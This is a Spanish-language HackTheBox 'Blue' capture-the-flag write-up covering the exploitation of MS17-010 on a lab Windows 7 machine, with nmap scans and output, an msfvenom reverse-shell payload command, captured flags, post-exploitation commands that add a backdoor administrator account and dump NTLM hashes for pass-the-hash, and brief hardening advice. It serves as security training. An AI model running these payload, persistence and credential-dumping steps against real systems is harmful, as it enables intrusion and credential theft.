Home HackTheBox Blue
Post
Cancel

HackTheBox Blue

Enumeración

System IP: 10.10.10.40

Matriz de la maquina

Esta matriz nos muestra las características de explotación de la maquina.

Matriz de la maquina

Enumeración de servicios

The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test. In some cases, some ports may not be listed.

Server IP AddressPorts Open
10.10.10.40TCP: 135,139,445,49154

Nmap Scan Resultados:

Usando el siguiente comando para enumerar las versiones y servicios que corren en cada puerto luego de hacer un escaneo de puertos abiertos.

1
nmap -sC -sV -p135,139,445,49154 10.10.10.40 -Pn  

Nos arroja este resultado:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
nmap -sC -sV -p135,139,445,49154 10.10.10.40 -Pn                                                                                                               
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-01 15:02 EDT
Nmap scan report for 10.10.10.40
Host is up (0.17s latency).

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49154/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -19m38s, deviation: 34m35s, median: 19s
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-08-01T20:03:27+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-08-01T19:03:24
|_  start_date: 2021-08-01T16:10:04

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.87 seconds

Enumerando vulnerabilidades con nmap

Usando el siguiente comando para enumerar las vulnerabilidades más comunes que presentan cada servicio, si es que existen.

1
nmap --script vuln 10.10.10.40

Nos arroja este resultado:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-01 16:24 EDT
Nmap scan report for 10.10.10.40
Host is up (0.29s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 147.18 seconds

Identificación de vulnerabilidades

Explicación de vulnerabilidad:

Segun los resultados de nmap podemos observar que es vulnerable a ejecución remota de codigo, revisando el cve en google encontramos el exploit para esta vulnerabilidad.

Severidad:

Escala de severidad

Codigo de la prueba de concepto:

A continuación se presente el codigo de la prueba de concepto:

Codigo de la prueba de concepto

Acceso al sistema

Para poder acceder al sistema elaboramos un payload que se ejecutará en la maquina victima, lo elaboramos con el siguiente comando con msfvenom y lo guardamos con el nombre shell.exe.

1
msfvenom -p windows/reverse_shell_tcp lhost=tun0 lport=443 -f exe > shell.exe

Cambiando los comandos a ejecutar

Modificando el exploit para crear un usuario guest.

Modificando el usuario y contraseña

Estableciendo los comandos a ejecutar, en este caso enviamos el archivo compilado en formato .exe y ejecutamos el payload generado en la maquina victima.

Comandos que permiten el envio del payload

Luego de haber ejecutaco el exploit obtenemos una shell con maximos privilegios (nt/ authority system), entonces podemos observar el user.txt y root.txt.

Prueba de acceso como administrador

Prueba de obtención del user.txt

flag: 4c546aea7dbee75cbd71de245c8deea9

Prueba del User.txt

Escalamiento de privilegios

Al haber obtenido acceso como usuario de maximos privilegios con el exploit ejecutado, esta fase se omitirá

Prueba de obtención del root.txt

flag: ff548eb71e920ff6c08843ce9df4e717

Prueba del root.txt

Tecnicas Post-explotación

Agregando usuarios con permisos de administrador

  • Podemos crear usuarios con permisos de administrador con el siguiente comando:
1
net user usuario 12345 /add

y asignarlos a un grupo el cual sería administrador con el siguiente comando:

1
net localgroup administrator usuario /add

Creando usuario de persistencia

Dumpeando los hashes de los usuarios para acceder al sistema posteriormente con la tecnica de passthehash.

  • Una vez con el acceso de administrador podemos modificar el UAC para obtener los hashes ntlm de los administradores con crackmapexec y así poder logearnos como administradores solo con el ntlm hash.

Modificando el token policie

Dumpeando los hashes de los usuarios

Tecnicas de Hardening

  • Mantener siempre el software y las ventanas actualizadas con la última versión, las correcciones y los parches para reducir el riesgo de ser comprometido por tales vulnerabilidades.

  • Deshabilitar el servicio SMBV1 del puerto 445 de la maquina o establecer reglas de firewalls para ocultarlo.

Gracias por leer, Happy hacking and always try harder!

This post is licensed under CC BY 4.0 by the author.

HackTheBox Writeup

HackTheBox Knife